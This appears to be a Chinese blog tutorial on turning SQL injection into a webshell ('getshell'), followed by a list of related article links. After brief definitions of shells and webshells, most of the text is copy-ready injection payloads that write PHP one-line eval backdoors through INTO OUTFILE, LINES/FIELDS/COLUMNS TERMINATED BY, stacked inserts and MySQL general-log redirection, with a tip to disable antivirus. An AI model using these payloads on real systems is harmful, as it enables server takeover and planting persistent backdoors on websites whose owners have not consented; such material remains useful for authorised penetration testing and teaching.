SQL注入-getshell
目录
一、getshell的含义
1.什么是shell?
2.什么是webshell?
3.什么是getshell
二、大马和小马的比较
三、SQL注入getshell
1.写文件--into outfile
2.union select getshell
3.lines starting getshell
4.fields terminated getshell
5.COLUMNS terminated getshell
6.getshell-数据表getshell
7.getshell-日志getshell
一、getshell的含义
1.什么是shell?
Shell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。
2.什么是webshell?
WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
3.什么是getshell
攻击者通过多种漏洞常见如文件上传、SQL注入、命令执行、文件包含、解析漏洞等,将脚本文件上传到Web服务器,并让服务器解析,从而使攻击者能得到一个与服务器进行交互的命令执行环境,进而得以控制服务器。
二、大马和小马的比较
小马(一句话木马) | 大马 | |
功能 | 功能简单,需要配合客户端使用 | 功能完善,直接使用浏览器即可利用 |
文件大小 | 代码量通常在一行左右,不超过10行 | 代码量通常较大 |
隐蔽性 | 强,容易通过变形隐藏特征,绕过过滤 | 相对较弱,代码量大,通常需要通过加密等方式来隐藏特征。 |
三、SQL注入getshell
1.写文件--into outfile
前提:
- 网站的绝对路径
- 没有对引号进行过滤
- 文件必须有写的权限
2.union select getshell
payload:1' union select 1,'<?php eval("$_POST[2]")?>',3 into outfile 'd:/phpstudy_pro/www/1.php'--+
注意:需要关闭电脑的病毒检测
使用c刀连接
2.lines terminated by
lines terminated by 该语句是设置每行数据结尾的字符,可以设置为单个或多个字符,默认为“/n”;
payload: ?id=1' into outfile 'd:/phpstudy_pro/www/2.php'lines terminated by'<?php eval("$_POST[8]")?>'--+3.
3.lines starting getshell
lines starting getshell该语句为设置每行开头的字符
payload:?id=1' into outfile 'd:/phpstudy_pro/www/3.php'lines starting by'<?php eval("$_POST[8]")?>'--+
4.fields terminated getshell
fields terminated by 设置字段之间的分隔符,默认值是"\t"
payload:?id=1')) into outfile'd:/phpstudy_pro/www/4.php' fields terminated by '<?php eval("$_POST[8]")?>'--+
5.COLUMNS terminated getshell
COLUMNS terminated by 设置字段之间的分隔符,默认值是"\t"
payload:?id=1')) into outfile'd:/phpstudy_pro/www/6.php' COLUMNS terminated by'<?php eval("$_POST[4]")?>'--+
6.getshell-数据表getshell
前提:需要将shell内容插入数据表中,在将表内容写成可执行文件,所以要想利用它getshell,一般数据库有堆叠注入或phpmyadmin或有一个数据库的基本权限才能getshell。
payload:id=1';insert into users(username,password) values('<?php eval("','$_POST[2]")?>')--+
7.getshell-日志getshell
7.1 开启全局日志配置
payload:?id=1';set global general_log = on;--+
7.2设置日志路径(webshell路径)
id=1';set global general_log_file = 'd:/phpStudy_pro/WWW/8.php';--+
7.3写入木马病毒
id=1';select '<?php eval("$_POST[2]")?>';--+
payload:
SQL注入-getshell相关推荐
- mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
### 简要描述: Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它.这个漏洞 ...
- SQL注入getshell
通过数据库的into outfie可以写入一句话木马进行getshell,由于利用环境相对苛刻,实际环境不常见,现以bWAPP靶场作为验证环境. 选择SQL Injection (GET/Select ...
- Emlog漏洞————Emlog相册插件前台SQL注入+Getshell
Emlog简介 Emlog是"Every Memory Log"的简介,意即:点滴记忆.它是一款基于PHP语言哈MYSQL数据库的开源.免费.功能强大的个人或多人联合撰写的博客系统 ...
- 禅道826版本SQL注入,登录绕过以及禅道826后台GetShell的小技巧
SQL注入由 orderBy($order) 函数过滤不严格导致.但是,这个函数对传进的参数进行了一系列过滤,导致 getshell 的条件比较苛刻.不甘心,于是乎找了一个比较好利用的地方.我只是以这 ...
- mysql 漏洞 wa_[漏洞案例]thinkcmf 2.x从sql注入到getshell实战
文章中提到了三个漏洞,一个注入,两个模板注入写shell. 但是系统是部署在linux下面的,模板注入是不行的. 所以文章编辑处的sql注入漏洞是比较好的方法了. 但是这里的注入需要登陆. 虽然网站默 ...
- 从sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法)
`搜索公众号:白帽子左一,每天更新技术干货! 作者:掌控安全学员--君叹 基本界面 试试看信息列表里面随便点一条看下网络请求 可以看到一个带有参数的请求,我们试着直接访问 直接访问的话能够看到直接的文 ...
- 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell
最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...
- 网络安全-实战篇 ZZZPHP1.61 代码审计-从SQL注入到Getshell
近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少. 今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏 ...
- pythom打包文件太大_从SQL注入到整站打包与本地搭建
一.前言 如题,由于是在已知有一处sql注入的情况下才接手进行的后续操作,因此前面信息搜集则一笔带过. 二.信息搜集 目标是个本地的传销站点其大致信息为IIS+ASP.NET+安全狗.腾讯云. 三.B ...
最新文章
- java操作跨页的word cell,“excle如何打印不出现断行“EXCEL中,如何不跨页断行打印或显示,谢谢...
- 2.3 《计算机组成原理》之浮点数的表示(基本格式、规格化[左规右规]、表示范围、IEEE754标准详解)
- 机器学习笔记III: 基于支持向量机的分类预测
- 二 vue环境搭建
- Pythonic版二分查找
- 设计一个Enum Class
- 图书馆管理系统(使用数据库实现)
- 趣头条面试题:ThreadLocal是什么?怎么用?为什么用它?有什么缺点
- Spark实践的阶段性总结
- php 图片 字母识别,PHP图片文字识别(OCR)
- 小米电视机如何重新匹配遥控器
- 笔记本桌面计算机图标不显示不出来,电脑桌面一片空白不显示图标的处理方法...
- 蛋花花:人类与“人工智能”相比,人类还有优势吗
- 解决XP系统每次关机都自动重启问题
- The application server could not be contacted
- 文章转载-狂人日记-鲁迅
- RMQ---csu1809
- 一种近似AMP音频增益转dB的优化写法:20.0*log10(amp)
- 国内首个,成都智算中心成东数西算应用混合方案的数据中心样板
- 3.html常用标签
热门文章
- JavaScript——防止手机中网页放大和缩小
- MATLAB算法实战应用案例精讲-【数模应用】多元线性回归(MLR)(附Java、R语言、python和matlab代码实现)
- 【数据说·小剧场】#经验#线下门店 “拓留锁升”的策略
- 视频美颜SDK在直播领域的应用与挑战
- 【回溯算法】【打卡第179道】:leetCode :39. 组合总和(数组中的元素可以重复使用)
- Markdown语法之段落与换行
- python加权最小二乘_用Python实现最小二乘算法
- 两台计算机互联,其中一台能ping通另一台却无法连通,执行Ping成功而网络无法使用 的解决
- Java抽象类为什么能实例化?
- 树莓派安装Docker方法